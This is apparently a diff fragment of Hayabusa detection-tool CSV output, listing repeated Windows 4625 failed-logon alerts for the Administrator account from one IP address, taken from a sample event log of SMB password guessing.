+2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d4eD3JQ5gquIqgND | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9slFFSSXhFxPqG1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDb5Up4KwJj0hN5n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxqIpDLlnf6Xyc34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTCTTYmKTIzzJwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oD3dLxlB3qWIhZEQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fe9xMOoCxPJIIyVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DW3YgBZYiGTeEw66 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VAKeeIcOeiQ3H9NF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmF3ot3gJCsBlSwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDjoResfZvvVqqE5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: V4dwzMwvVtzztGwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qklApBFOMxVzucD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0IJSphtLB3eNARBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLOFe4w5KpJ2UaGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3JTWkGadY1fJE2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyTH0jxSZB2YVdhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NRq5XrcDkFvabCzh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlYwlgrsMy1kSgEC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AchwW4ifbZ41AQNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PaxF7Q8ue1Kex1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WAhW2PErXdwNVrx5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoAV3ESqieev2JMC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFlWFijaFirgsAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSDjuqvzKLaWCWVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SL0CVu787iFRLiPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZQDORN33izpv4tGO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v470yorD43fgGyjC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: LBbLWVZFDqFxb7dW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJsowt9MrhXciLOZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uhCVFyMmDI5shASV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yd4SM9EGM7cnO6Z5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSR1tbtzdDaJDbXs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rNqyjBuN0Pq6WRO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vqpMAmE9OvHbFCh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfLQAaB0DPvxWQMB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0kvHMwnj2k0HMLQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kPqfVDftcR4iRDaw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bltwm2g13InAJM6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2iFr8ppe5NzukXF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EEUOBohBFRze6hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCOFn3WM71KmaZyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UdUkBxB1auduRfdS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2JaWoYK56HRGfW1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3JTCX9NIOpg6TFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zFGkdUVAdKcrrREB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oZW00FpKema01Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p4HbNQx0Acf83b1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aM5UCQbOLvcpI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGGChEAIdej9lBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CaFYB1ImWAWbH0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLa3lkxWiJ00raQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMzyi0jIVLNrodC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2repX0roAP2j0TI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gqcpIjdkNpmoTe4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edgo9UdNvmMJpiyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LpqOTu7Xn7ULipmN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TP0efL79STMbuu9g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HkwWfRi0E5sVY6UT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkyCe9NXGExCQS5r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IGnhRwa7P7by9vJO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fh7IGliNbSyKwxpM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 1QfgWsAqSYQfB9l5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8VM66P8Vluf7yrL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cdYiwh3QjdA0Zoge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ou3FPUI5bFcUvuFC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMUg8N7apFtUgX9d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U7Cn4n7jQAQaxP6y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urflPvd1vgYYi2ra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pqFtTDD69fNTKROG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: teUZYpNyqJ64Dgcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9kaKSy3DV5fRKvTc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtiZUzpwrnuWIjna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SD9UhsShNJRp251r | IP Addr: 192.168.198.149 | AuthPackage: 
